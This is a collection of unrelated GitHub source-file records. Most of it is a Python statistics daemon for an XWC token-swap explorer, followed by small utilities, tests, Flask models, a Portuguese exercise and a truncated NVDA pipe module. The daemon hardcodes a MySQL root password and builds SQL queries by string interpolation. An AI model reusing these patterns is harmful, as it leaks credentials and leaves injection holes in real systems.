segStart = b[0]\n if endBlock >= b[0]+perWeekBlock:\n segEnd = b[0]+perWeekBlock\n else:\n segEnd = endBlock\n reward += (segEnd-segStart) * b[1]\n return reward\n\n def tpStat(self, address):\n currentHeight = self._xwc_api.get_block_height()\n currentTime = int(time.time()) - 28800 # convert to UTC timestamp\n #block = self._xwc_api.get_block(5190601)\n #blockTime = int(time.mktime(time.strptime(block['timestamp'], \"%Y-%m-%dT%H:%M:%S\")))\n #print(blockTime)\n #print(currentTime-blockTime)\n #return\n temp24HourHeight = self.last24HourBlock if self.last24HourBlock > 0 else currentHeight - 14400\n temp1HourHeight = self.last1HourBlock if self.last1HourBlock > 0 else currentHeight - 600\n self.last24HourBlock = self._getMatchedBlock(temp24HourHeight, currentHeight, currentTime-86400)\n self.last1HourBlock = self._getMatchedBlock(temp1HourHeight, currentHeight, currentTime-3600)\n tpStat = {}\n if self.last24HourBlock > 0 and self.last1HourBlock > 0:\n if address == 'XWCCJV5jJ8acWx3AfVPUT6x1K2hXRkptZ8hGB':\n tpStat['tp1Hour'] = (currentHeight - self.last1HourBlock) * self.perBlockTp\n tpStat['tp24Hour'] = (currentHeight - self.last24HourBlock) * self.perBlockTp\n tpStat['tpSupply'] = (currentHeight - self.firstTpBlock) * self.perBlockTp\n if tpStat['tpSupply'] > 30000:\n tpStat['tpSupply'] = 30000\n tpStat['tp1Hour'] = 0\n tpStat['tp24Hour'] = 0\n elif address == 'XWCCarrfVrHCRupUbJfasasx2Rdy4Aor8eTD9':\n tpStat['tp1Hour'] = self._getBatch2Reward(self.last1HourBlock, currentHeight, 20000)\n tpStat['tp24Hour'] = self._getBatch2Reward(self.last24HourBlock, currentHeight, 20000)\n tpStat['tpSupply'] = self._getBatch2Reward(5360500, currentHeight, 20000)\n if tpStat['tpSupply'] > 20000:\n tpStat['tpSupply'] = 20000\n tpStat['tp1Hour'] = 0\n tpStat['tp24Hour'] = 0\n elif address == 'XWCCcUF3uQDHzyhAuKsZ9DtFyVBcFuousjR6w':\n tpStat['tp1Hour'] = self._getBatch2Reward(self.last1HourBlock, currentHeight, 50000)\n tpStat['tp24Hour'] = self._getBatch2Reward(self.last24HourBlock, currentHeight, 50000)\n tpStat['tpSupply'] = self._getBatch2Reward(5360500, currentHeight, 50000)\n if tpStat['tpSupply'] > 50000:\n tpStat['tpSupply'] = 50000\n tpStat['tp1Hour'] = 0\n tpStat['tp24Hour'] = 0\n return tpStat\n\n def swapStat(self, address, token1, token2):\n data = {\n #'fee': { token2: 0, token1: 0 },\n 'rate1Day': { token2: 0, token1:0 },\n 'pool': { token2: 0, token1: 0 },\n 'price': { token2: 0, token1: 0 }\n }\n ticker = self._xt_api.get_ticker(f'{token1.lower()}_usdt')\n data['rate1Day'][token1] = f\"{ticker['rate']}\"\n data['price'][token1] = ticker['price']\n if token2 != 'CUSD':\n ticker = self._xt_api.get_ticker(f'{token2.lower()}_usdt')\n data['rate1Day'][token2] = f\"{ticker['rate']}\"\n data['price'][token2] = ticker['price']\n else:\n data['rate1Day'][token2] = 0\n data['price'][token2] = 1\n info = self._xwc_api.get_depth(f'{token1.lower()}_{token2.lower()}')\n if info is None:\n return\n print(info['token_1_contractAddr'], token1, self.addr2Token(info['token_1_contractAddr']))\n if info['token_1_contractAddr'] == token1 or token1 == self.addr2Token(info['token_1_contractAddr']):\n data['pool'][token1] = f\"{info['token_1_pool_amount']/10**8:>.4f}\"\n data['pool'][token2] = f\"{info['token_2_pool_amount']/10**8:>.4f}\"\n else:\n data['pool'][token2] = f\"{info['token_1_pool_amount']/10**8:>.4f}\"\n data['pool'][token1] = f\"{info['token_2_pool_amount']/10**8:>.4f}\"\n print(f\"{token2}: {info['token_1_pool_amount']/10**8:>.4f}, {token1}: {info['token_2_pool_amount']/10**8:>.4f}\")\n \n db = pymysql.connect(host=\"192.168.0.209\",\n user=\"root\",\n password=\"12PV1Kjlh\",\n port=3306,\n database=\"xwc_explorer\",\n charset='utf8')\n cursor = db.cursor()\n try:\n cursor.execute(\"select min(block_num) from bl_block where block_time > date_sub(now(), interval 1 DAY)\")\n results = cursor.fetchall()\n block1Day = results[0][0]\n cursor.execute(\"select min(block_num) from bl_block where block_time > date_sub(now(), interval 7 DAY)\")\n results = cursor.fetchall()\n block7Day = results[0][0]\n cursor.execute(f\"select count(*) from bl_tx_events where contract_address = '{address}' and event_name='Exchanged' and block_num < {block1Day}\")\n results = cursor.fetchall()\n txCountBefore24 = results[0][0]\n except:\n return\n txCount = 0\n # all days\n try:\n exData = {'exchange': {token2: 0, token1: 0}, 'fee': {token2: 0, token1: 0}}\n ex1DayData = {'exchange': {token2: 0, token1: 0}, 'fee': {token2: 0, token1: 0}}\n ex7DaysData = {'exchange': {token2: 0, token1: 0}, 'fee': {token2: 0, token1: 0}}\n cursor.execute(f\"select event_arg,block_num from bl_tx_events where contract_address = '{address}' and event_name='Exchanged'\")\n results = cursor.fetchall()\n for row in results:\n txCount += 1\n exchange = json.loads(row[0])\n exchange['buy_asset'] = self.addr2Token(exchange['buy_asset'])\n exchange['sell_asset'] = self.addr2Token(exchange['sell_asset'])\n exData['fee'][exchange['sell_asset']] += exchange['fee']\n exData['exchange'][exchange['buy_asset']] += exchange['buy_amount']\n exData['exchange'][exchange['sell_asset']] += exchange['sell_amount']\n if row[1] > block1Day:\n ex1DayData['fee'][exchange['sell_asset']] += exchange['fee']\n ex1DayData['exchange'][exchange['buy_asset']] += exchange['buy_amount']\n ex1DayData['exchange'][exchange['sell_asset']] += exchange['sell_amount']\n if row[1] > block7Day:\n ex7DaysData['fee'][exchange['sell_asset']] += exchange['fee']\n ex7DaysData['exchange'][exchange['buy_asset']] += exchange['buy_amount']\n ex7DaysData['exchange'][exchange['sell_asset']] += exchange['sell_amount']\n exData['exchange'][token2] = f\"{exData['exchange'][token2]/10**8:>.4f}\"\n exData['exchange'][token1] = f\"{exData['exchange'][token1]/10**8:>.4f}\"\n exData['fee'][token2] = f\"{exData['fee'][token2]/10**8:>.4f}\"\n exData['fee'][token1] = f\"{exData['fee'][token1]/10**8:>.4f}\"\n ex1DayData['exchange'][token2] = f\"{ex1DayData['exchange'][token2]/10**8:>.4f}\"\n ex1DayData['exchange'][token1] = f\"{ex1DayData['exchange'][token1]/10**8:>.4f}\"\n ex1DayData['fee'][token2] = f\"{ex1DayData['fee'][token2]/10**8:>.4f}\"\n ex1DayData['fee'][token1] = f\"{ex1DayData['fee'][token1]/10**8:>.4f}\"\n ex7DaysData['exchange'][token2] = f\"{ex7DaysData['exchange'][token2]/10**8:>.4f}\"\n ex7DaysData['exchange'][token1] = f\"{ex7DaysData['exchange'][token1]/10**8:>.4f}\"\n ex7DaysData['fee'][token2] = f\"{ex7DaysData['fee'][token2]/10**8:>.4f}\"\n ex7DaysData['fee'][token1] = f\"{ex7DaysData['fee'][token1]/10**8:>.4f}\"\n data['allDay'] = exData\n data['1day'] = ex1DayData\n data['7day'] = ex7DaysData\n except Exception as e:\n print(str(e))\n pass\n data['txCount'] = txCount\n data['txCountBefore24'] = txCountBefore24\n data['tpStat'] = self.tpStat(address)\n print(json.dumps(data))\n return data\n\n def _updateSinglePair(self, address, start_block_num, ex_pair):\n precision = 10 ** 8\n try:\n #cursor.execute(f\"select event_arg,block_num from bl_tx_events where contract_address = '{address}' and event_name='Exchanged' and block_num > {start_block_num}\")\n #results = cursor.fetchall()\n results = session.query(BlTxEvents.event_arg,BlTxEvents.block_num). \\\n filter(\n BlTxEvents.contract_address==address,\n BlTxEvents.event_name=='Exchanged',\n BlTxEvents.block_num>start_block_num).\\\n all()\n lastBlockTime = 0\n lastBlockNum = 0\n for r in results:\n exchange = json.loads(r[0])\n exchange['buy_asset'] = self.addr2Token(exchange['buy_asset'])\n exchange['sell_asset'] = self.addr2Token(exchange['sell_asset'])\n if exchange['buy_asset'] == 'XWC':\n price = exchange['sell_amount'] / exchange['buy_amount']\n volume = exchange['buy_amount'] / precision\n elif exchange['sell_asset'] == 'XWC':\n price = exchange['buy_amount'] / exchange['sell_amount']\n volume = exchange['sell_amount'] / precision\n else:\n price = 0\n volume = 0\n exchange['buy_amount'] = exchange['buy_amount'] / precision\n exchange['sell_amount'] = exchange['sell_amount'] / precision\n exchange['fee'] = exchange['fee'] / precision\n if lastBlockNum == 0 or lastBlockNum != r[1]:\n block = session.query(BlBlock.block_time).filter(BlBlock.block_num==r[1]).first()\n lastBlockNum = r[1]\n lastBlockTime = block.block_time\n session.add(StSwapTick(\n timestamp=lastBlockTime,\n ex_pair=ex_pair,\n buy_asset=exchange['buy_asset'],\n sell_asset=exchange['sell_asset'],\n buy_amount=exchange['buy_amount'],\n sell_amount=exchange['sell_amount'],\n fee=exchange['fee'],\n block_num=lastBlockNum,\n price=price,\n volume=volume\n ))\n except Exception as e:\n print(str(e))\n return\n \n\n def updateTick(self):\n last_tick = session.query(func.max(StSwapTick.block_num).label('block_num')).first()\n if last_tick.block_num is None:\n print(\"first time\")\n start_block_num = 4992608\n else:\n start_block_num = int(last_tick.block_num)\n print(f'update tick - start block: {start_block_num}')\n for k, v in self.pairs.items():\n self._updateSinglePair(v, start_block_num, k)\n session.commit()\n print('tick updated')\n\n def updateKline(self):\n from libs.models import StSwapKdata1Min, StSwapKdata5Min, StSwapKdata15Min, \\\n StSwapKdata30Min, StSwapKdataDaily, StSwapKdata6Hour, StSwapKdataWeekly, \\\n StSwapKdata1Hour, StSwapKdata2Hour, StSwapKdata12Hour, \\\n StSwapKdataMonthly\n from libs.k_line_obj import KLine1MinObj, KLine5MinObj, KLine15MinObj, KLine30MinObj, KLine1HourObj, KLine2HourObj, \\\n KLine6HourObj, KLine12HourObj, KLineWeeklyObj, KLineDailyObj, KLineMonthlyObj\n def process_kline_common(base_table, target_table, process_obj, pair):\n #print(\"base: %s, target: %s, pair: %s\" % (str(base_table), str(target_table), pair))\n k_last = session.query(target_table).filter(target_table.ex_pair==pair).order_by(target_table.timestamp.desc()).limit(1).first()\n k = process_obj(k_last)\n if k_last is None:\n # if str(base_table) == \"\":\n last_time = datetime.datetime.utcnow() - datetime.timedelta(days=365)\n else:\n last_time = k_last.timestamp\n #print(\"last time: %s\" % (last_time))\n ticks = session.query(base_table).filter(base_table.ex_pair==pair, base_table.timestamp>=last_time).order_by(base_table.id).all()\n for t in ticks:\n k.process_tick(t)\n for r in k.get_k_data():\n if k_last is not None and k_last.timestamp == r['start_time']:\n session.query(target_table).filter_by(timestamp=k_last.timestamp, ex_pair=pair).delete()\n session.add(target_table(ex_pair=pair, k_open=r['k_open'], k_close=r['k_close'], \\\n k_high=r['k_high'], k_low=r['k_low'], timestamp=r['start_time'], \\\n block_num=r['block_num'], volume=r['volume']))\n\n for p in self.pairs.keys():\n # Process 1-minute K-Line\n process_kline_common(StSwapTick, StSwapKdata1Min, KLine1MinObj, p)\n # Process 5-minutes K-Line\n process_kline_common(StSwapKdata1Min, StSwapKdata5Min, KLine5MinObj, p)\n # Process 15-minutes K-Line\n process_kline_common(StSwapKdata1Min, StSwapKdata15Min, KLine15MinObj, p)\n # Process 30-minutes K-Line\n process_kline_common(StSwapKdata1Min, StSwapKdata30Min, KLine30MinObj, p)\n # Process 1-hour K-Line\n process_kline_common(StSwapKdata1Min, StSwapKdata1Hour, KLine1HourObj, p)\n # Process 2-hour K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdata2Hour, KLine2HourObj, p)\n # Process 6-hour K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdata6Hour, KLine6HourObj, p)\n # Process 12-hour K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdata12Hour, KLine12HourObj, p)\n # Process daily K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdataDaily, KLineDailyObj, p)\n # Process weekly K-Line\n process_kline_common(StSwapKdata1Hour, StSwapKdataWeekly, KLineWeeklyObj, p)\n # Process monthly K-Line\n process_kline_common(StSwapKdataDaily, StSwapKdataMonthly, KLineMonthlyObj, p)\n session.commit()\n\n def _updateSinglePairLiqiuidy(self, startBlock, pair, contract, lastBlock):\n tokens = pair.split('_')\n tokens[0] = tokens[0].upper()\n tokens[1] = tokens[1].upper()\n #events = session.query(BlTxEvents.event_name,BlTxEvents.event_arg,BlTxEvents.block_num,BlBlock.block_time).\\\n #join(BlBlock, BlBlock.block_num==BlTxEvents.block_num).\\\n #filter(\\\n #BlTxEvents.block_num>startBlock,\n #BlTxEvents.event_name.in_(('Exchanged','LiquidityAdded','LiquidityRemoved')),\n #BlTxEvents.contract_address==contract).\\\n #order_by(BlTxEvents.block_num).all()\n lastRecord = session.query(StSwapLiquidity).filter(\n StSwapLiquidity.tp_name==pair).order_by(StSwapLiquidity.stat_time.desc()).first()\n currentRecord = {\n 'stat_time': 0,\n 'token1_amount': 0,\n 'token2_amount': 0,\n 'block_num': 0\n }\n if lastRecord is not None:\n currentRecord['stat_time'] = lastRecord.stat_time\n currentRecord['token1_amount'] = lastRecord.token1_amount\n currentRecord['token2_amount'] = lastRecord.token2_amount\n today = datetime.date.today()\n today = datetime.datetime(today.year, today.month, today.day)\n if currentRecord['stat_time'] != today:\n currentRecord['stat_time'] = today\n events = self._xwc_api.get_contract_events(contract, startBlock, lastBlock-startBlock)\n for e in events:\n if currentRecord['block_num'] != e['block_num']:\n currentRecord['block_num'] = e['block_num']\n block = session.query(BlBlock.block_time).filter(BlBlock.block_num==e['block_num']).first()\n blockTime = block[0]\n blockDay = datetime.datetime(blockTime.year, blockTime.month, blockTime.day)\n if currentRecord['stat_time'] == 0:\n currentRecord['stat_time'] = blockDay\n elif currentRecord['stat_time'] != blockDay and currentRecord['token1_amount'] > 0 and currentRecord['token2_amount'] > 0:\n # TODO, commit record and reset currentRecord\n session.query(StSwapLiquidity).filter(StSwapLiquidity.tp_name==pair,StSwapLiquidity.stat_time==currentRecord['stat_time']).delete()\n session.add(StSwapLiquidity(\n tp_name=pair,\n token1_name=tokens[0],\n token2_name=tokens[1],\n token1_amount=currentRecord['token1_amount'],\n token2_amount=currentRecord['token2_amount'],\n stat_time=currentRecord['stat_time']\n ))\n currentRecord['stat_time'] = blockDay\n if e['event_name'] == 'LiquidityAdded':\n liquidityChange = json.loads(e['event_arg'])\n currentRecord['token1_amount'] += int(liquidityChange[self.token2Addr(tokens[0])])\n currentRecord['token2_amount'] += int(liquidityChange[self.token2Addr(tokens[1])])\n elif e['event_name'] == 'LiquidityRemoved':\n liquidityChange = json.loads(e['event_arg'])\n currentRecord['token1_amount'] -= int(liquidityChange[self.token2Addr(tokens[0])])\n currentRecord['token2_amount'] -= int(liquidityChange[self.token2Addr(tokens[1])])\n elif e['event_name'] == 'Exchanged':\n liquidityChange = json.loads(e['event_arg'])\n liquidityChange['buy_asset'] = self.addr2Token(liquidityChange['buy_asset'])\n if tokens[0] == liquidityChange['buy_asset']:\n currentRecord['token1_amount'] -= int(liquidityChange['buy_amount'])\n currentRecord['token2_amount'] += int(liquidityChange['sell_amount'])\n else:\n currentRecord['token2_amount'] -= int(liquidityChange['buy_amount'])\n currentRecord['token1_amount'] += int(liquidityChange['sell_amount'])\n else:\n continue\n if currentRecord['token1_amount'] > 0 and currentRecord['token2_amount'] > 0:\n session.query(StSwapLiquidity).filter(StSwapLiquidity.tp_name==pair,StSwapLiquidity.stat_time==currentRecord['stat_time']).delete()\n session.add(StSwapLiquidity(\n tp_name=pair,\n token1_name=tokens[0],\n token2_name=tokens[1],\n token1_amount=currentRecord['token1_amount'],\n token2_amount=currentRecord['token2_amount'],\n stat_time=currentRecord['stat_time']\n ))\n\n def updateLiquidity(self):\n lastBlock = 4953249\n lastBlockRecord = session.query(StSwapStat.swap_value).filter(StSwapStat.swap_stat=='liquidity_scan_block').first()\n if lastBlockRecord is not None:\n blockNum = int(lastBlockRecord[0])\n if blockNum > lastBlock:\n lastBlock = blockNum\n currentBlock = self._xwc_api.get_block_height()\n for p, c in self.pairs.items():\n self._updateSinglePairLiqiuidy(lastBlock, p, c, currentBlock)\n session.query(StSwapStat).filter(StSwapStat.swap_stat=='liquidity_scan_block').delete()\n session.add(StSwapStat(\n swap_stat='liquidity_scan_block',\n swap_value=currentBlock\n ))\n session.commit()\n print('updateLiquidity committed')\n \n\n def stat(self):\n data = {}\n for k, v in self.pairs.items():\n pairs = k.split('_')\n data[k] = self.swapStat(v, pairs[0].upper(), pairs[1].upper())\n json.dump(data, open('/var/www/html/tokenswap_stat.json', 'w'))\n #json.dump(data, open('tokenswap_stat.json', 'w'))\n\n\nif __name__ == '__main__':\n xwc_api = XWC('http://localhost:10044/api', 'caller0')\n xt_api = Api(\"\", \"\")\n statObj = TokenSwapStat(xwc_api, xt_api)\n while True:\n try:\n statObj.stat()\n statObj.updateTick()\n statObj.updateKline()\n statObj.updateLiquidity()\n except Exception as e:\n print(str(e))\n time.sleep(6)\n #statObj.tpStat()\n","repo_name":"realm520/tp_swap_stat","sub_path":"stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":23321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13901743746","text":"import numpy as np\r\nimport torch\r\n\r\ndef precision_difF(lbls, pred_lbls):\r\n pred_lbls = pred_lbls.squeeze(1)\r\n assert (lbls.shape == pred_lbls.shape)\r\n \r\n # sum_F_squre = torch.square(pred_F + F)\r\n # dif_F_squre = torch.square(pred_F - F)\r\n # sum_sqrue1 = torch.mean(sum_F_squre,dim=1)\r\n # sum_sqrue2 = torch.mean(dif_F_squre,dim=1)\r\n # min_sqr = torch.minimum(sum_sqrue1,sum_sqrue2)\r\n # dif_F = torch.mean(min_sqr)\r\n\r\n n_batch = lbls.shape[0]\r\n pt_pairs_batch = lbls.shape[1]\r\n mask1 = pred_lbls > 0\r\n pred_lbls[mask1] = 1.0\r\n mask2 = pred_lbls < 0\r\n pred_lbls[mask2] = 0.0\r\n\r\n dif_lbls = abs(lbls - pred_lbls)\r\n precision = 1 - torch.sum(dif_lbls)/(n_batch*pt_pairs_batch)\r\n\r\n false_mask = (pred_lbls < 0.00001) & (lbls < 0.00001)\r\n n_correct_false = torch.count_nonzero(false_mask)\r\n n_false = torch.count_nonzero(lbls < 0.00001)\r\n false_r = n_correct_false / n_false\r\n\r\n correct_mask = (pred_lbls > 0.00001) & (lbls > 0.00001)\r\n n_correct_true = torch.count_nonzero(correct_mask)\r\n n_correct = torch.count_nonzero(lbls > 0.00001)\r\n true_r = n_correct_true / n_correct\r\n\r\n\r\n return (precision, false_r, true_r)","repo_name":"csyhy1986/CE-net","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"26596181842","text":"import os\r\nimport pandas as pd\r\nfrom tabula import read_pdf\r\nimport tabula\r\nfrom utility import *\r\n\r\nexclude = [\"bosluk\", \"bos\", \"MILES&SMILES PROGRAM ORTAKLARI DIŞI HARCAMALARINIZ\", \"GİYİM\", \"DİĞER\"]\r\n\r\n\r\ndef garantiExcluded(text):\r\n for e in exclude:\r\n if e in text:\r\n return True\r\n return False\r\n\r\n\r\ndef parse_Garanti(filename: str):\r\n data = read_pdf(filename, pages=\"all\")\r\n data = data[0]\r\n data.to_csv(\"example.tsv\", index=False, header=None, sep='\\t')\r\n\r\n output = []\r\n for line in readTextFile(\"example.tsv\"):\r\n if not garantiExcluded(line):\r\n line = line.split(\"\\t\")\r\n desc = line[1]\r\n desc = desc[15:]\r\n line.pop(0)\r\n line.pop(0)\r\n line.pop(0)\r\n line.pop(0)\r\n line = [l for l in line if len(l) > 0]\r\n line = line[0]\r\n line = line.replace(\".\", \"\")\r\n line = float(line.replace(\",\", \".\"))\r\n if line > 0.0:\r\n output.append((desc, line))\r\n #: Delete the tsv file\r\n os.remove(\"example.tsv\")\r\n #: Return\r\n return output\r\n\r\n\r\nx = parse_Garanti(\"garanti.pdf\")\r\nfor key,value in x:\r\n print(str(key).lstrip(),\":\",value)\r\n ","repo_name":"srprkrbs1/ReadingCreditCardBill","sub_path":"garanti.py","file_name":"garanti.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34077273770","text":"import unittest\nimport socket\nfrom threading import Thread\nfrom collections import OrderedDict\n\nfrom scscp import client\nfrom scscp.client import SCSCPClientBase\nfrom scscp.server import SCSCPServerBase\n\nclass TestConnInit(unittest.TestCase):\n def setUp(self):\n server, client = socket.socketpair()\n self.client = SCSCPClientBase(client)\n self.server = SCSCPServerBase(server, name=b'Test', version=b'none', id=b'test-id')\n\n def test_successful(self):\n \"\"\" Test a successful connection initiation \"\"\"\n t = Thread(target=self.server.accept)\n t.start()\n self.client.connect()\n t.join()\n\n self.assertEqual(self.client.status, client.CONNECTED, \"Connected\")\n self.assertEqual(OrderedDict(self.client.service_info.items()),\n OrderedDict([\n ('service_name', b'Test'),\n ('service_version', b'none'),\n ('service_id', b'test-id'),\n ('scscp_versions', b'1.3')\n ]), \"Connected\")\n \n self.client.quit()\n self.assertEqual(self.client.status, client.CLOSED, \"Quitted\")\n\n def test_msg(self):\n \"\"\" Test a message exchange \"\"\"\n t = Thread(target=self.server.accept)\n t.start()\n self.client.connect()\n t.join()\n \n self.client.send(b\"Hello world!\")\n\n msg = self.server.receive()\n self.assertEqual(msg, b\"\\nHello world!\\n\")\n \n self.server.send(msg)\n msg = self.client.receive()\n self.assertEqual(msg, b\"\\n\\nHello world!\\n\\n\")\n\n self.server.quit()\n self.assertEqual(self.server.status, client.CLOSED, \"Quitted\")\n","repo_name":"OpenMath/py-scscp","sub_path":"tests/test_conn_init.py","file_name":"test_conn_init.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"31651275654","text":"import os\nfrom sqlalchemy import Column, String, Integer, \\\n create_engine, ForeignKey, DateTime, Table\nfrom flask_sqlalchemy import SQLAlchemy\nimport json\nfrom datetime import date\n# from flask import abort\n\nfrom sqlalchemy.orm import relationship\n\ndatabase_path = os.environ['DATABASE_URL']\ndb = SQLAlchemy()\n\n'''\nsetup_db(app)\n binds a flask application and a SQLAlchemy service\n'''\n\n\ndef setup_db(app, database_path=database_path):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n\n\n'''\nShow\n'''\n\nshows_table = Table('shows', db.metadata,\n Column('actors_id', Integer,\n ForeignKey('actors.id'), nullable=False),\n Column('movies_id', Integer,\n ForeignKey('movies.id'), nullable=False)\n )\n\n\n'''\nMovie\n\n'''\n\n\nclass Movie(db.Model):\n __tablename__ = 'movies'\n\n id = Column(Integer, primary_key=True)\n title = Column(String)\n release_date = Column(DateTime)\n # actors = relationship('Actor', backref='movies', lazy=True)\n actors = relationship(\"Actor\",\n secondary=shows_table,\n back_populates=\"movies\")\n\n def __init__(self, title, release_date):\n self.title = title\n self.release_date = release_date\n\n def insert(self):\n try:\n db.session.add(self)\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def update(self):\n try:\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def format(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'release_date': self.release_date\n }\n\n\n'''\nActor\n\n'''\n\n\nclass Actor(db.Model):\n __tablename__ = 'actors'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n gender = Column(String)\n birth_date = Column(DateTime)\n # movies = relationship('Movie', backref='actors', lazy=True)\n movies = relationship(\"Movie\",\n secondary=shows_table,\n back_populates=\"actors\")\n\n def __init__(self, name, gender, birth_date):\n self.name = name\n self.gender = gender\n self.birth_date = birth_date\n\n def insert(self):\n try:\n db.session.add(self)\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def update(self):\n try:\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'gender': self.gender,\n 'birth_date': self.birth_date\n }\n\n\n\"\"\"\nclass Show(db.Model):\n __tablename__ = 'shows'\n\n id = Column(Integer, primary_key=True)\n actor_id = Column(Integer, ForeignKey('actors.id'), nullable=False)\n movie_id = Column(Integer, ForeignKey('movies.id'), nullable=False)\n\"\"\"\n","repo_name":"mesh3l-966/capstone","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21455279803","text":"import pdb\n\n\n# for realizada uma pesquisa de algumas caracteristicas e gostos de quatro habitantes incluindo:\n# nome, sexo, esporte favorito (natação, futebol volei e tenis) e idade.\n#com esses dados faça:\n\n#função que armazene os dados em uma lista. Dica: use dicionarios dentro da lista.\n\n# calcule a idade média de homens que gostam de natação. Caso não haja homens que gostam de natação chame uma função e imprima um aviso de que não há homens que gostam de natação\n\n# minha resolução\n\n\nlista = []\n\ndef pesquisa(lista):\n nome = input('Digite seu nome: ')\n idade = int(input('Digite sua idade: '))\n sexo = input('Digite: M para sexo masculino e F para sexo feminino: ')\n sexoEscolhido = sexo.upper()\n esporte = input('Digite seu esporte favorito dentre (natação, futebol volei e tenis) : ')\n esporteEscolhido = esporte.upper()\n candidado = input('Existem mais candidatos? S para sim e N para não: ')\n proximoCandidato = candidado.upper()\n \n dicionario = dict(nome=nome,idade=idade,sexo=sexoEscolhido,esporteFavorito=esporteEscolhido)\n\n lista.append(dicionario)\n \n if proximoCandidato == 'S':\n pesquisa(lista)\n else:\n return \n \n \npesquisa(lista)\n\nprint(lista)\nprint('\\n')\n\n# mascNatacao = []\n\n# for item in lista:\n# if item['esporteFavorito'] == 'NATACAO' and item['sexo'] == 'M':\n# mascNatacao.append(item['esporteFavorito'])\n\n# print(mascNatacao.count('NATACAO'))\n\n\nmasc = list(filter(lambda item: item['esporteFavorito'] == 'NATACAO' and item['sexo'] == 'M', lista))\n\n\nprint(f'O total de homens que gostam de natação é igual a {len(masc)}')\n\n\nsoma = sum(n['idade'] for n in masc)\n\nmedia = soma / len(masc)\n\nprint(media)\n\n\n\n\n\n\n\n# resolução professor\n\ndef cadastro():\n list = []\n for i in range(4):\n dicionario = dict(nome = input('Digite seu nome: '),\n sexo = input('digite M para masculino e F para feminino'),\n esporte = input('Digite seu esporte favorito'),\n idade = int(input('Digite sua idade: ')))\n list.append(dicionario)\n return list\n \n \nlista = cadastro()\n \ncont = 0\nsoma = 0\n\nprint(lista)\n\ndef aviso():\n print('Nenhum homem gosta de natação!')\n\nfor indice,item in enumerate(len(lista)):\n if lista[indice]['sexo'] == 'M' and lista[indice]['esporte'] == \"natacao\":\n soma = soma + lista[indice]['idade']\n cont += 1\n\nif cont == 0:\n aviso()\nelse:\n media = soma / cont\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"castrintt/curso-python","sub_path":"funcoes/exercicio-funcao-sem-parametro.py","file_name":"exercicio-funcao-sem-parametro.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39791024671","text":"from decorators import check_for_name, only_strings\n\n@check_for_name\ndef print_my_name(greeting, my_name):\n print(\"----------print_my_name()\")\n print(f\"{greeting}, {my_name}\")\n\n@only_strings\ndef concat(a,b,c):\n result = a + b + c\n print(result)\n return result","repo_name":"BadArce/flask2-1","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17030348161","text":"class Process:\n def __init__(self, num=0, arrivalTime=0, burstTime=0, priority=0):\n self.num = num\n self.arrivalTime = arrivalTime\n self.burstTime = burstTime\n self.remaining = burstTime\n self.last = arrivalTime\n self.priority = priority\n self.status = 1 # 1 means active 0 means not active\n self.tat = 0\n self.waitingTime = 0\n self.weightedTAT = 0\n\n\ndef main():\n p = Process()\n print(vars(p))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MoamenAttia/Operating-Systems-Project","sub_path":"code files/Process.py","file_name":"Process.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14447547434","text":"import os\nfrom ctypes import (\n\tPOINTER,\n\tGetLastError,\n\tWinError,\n\tbyref,\n\tc_ulong,\n\tsizeof,\n\twindll,\n)\nfrom ctypes.wintypes import BOOL, DWORD, HANDLE, LPCWSTR\nfrom enum import IntFlag\nfrom glob import iglob\nfrom typing import Callable, Iterator, Optional, Union\n\nimport winKernel\nfrom appModuleHandler import processEntry32W\nfrom hwIo.base import IoBase\nfrom hwIo.ioThread import IoThread\nfrom logHandler import log\nfrom serial.win32 import (\n\tERROR_IO_PENDING,\n\tFILE_FLAG_OVERLAPPED,\n\tINVALID_HANDLE_VALUE,\n\tLPOVERLAPPED,\n\tOVERLAPPED,\n\tCreateFile,\n)\n\nfrom .ioThreadEx import IoThreadEx\n\nERROR_INVALID_HANDLE = 0x6\nERROR_PIPE_CONNECTED = 0x217\nERROR_PIPE_BUSY = 0xE7\nPIPE_DIRECTORY = \"\\\\\\\\?\\\\pipe\\\\\"\nRD_PIPE_GLOB_PATTERN = os.path.join(PIPE_DIRECTORY, \"RdPipe_NVDA-*\")\nSECURE_DESKTOP_GLOB_PATTERN = os.path.join(PIPE_DIRECTORY, 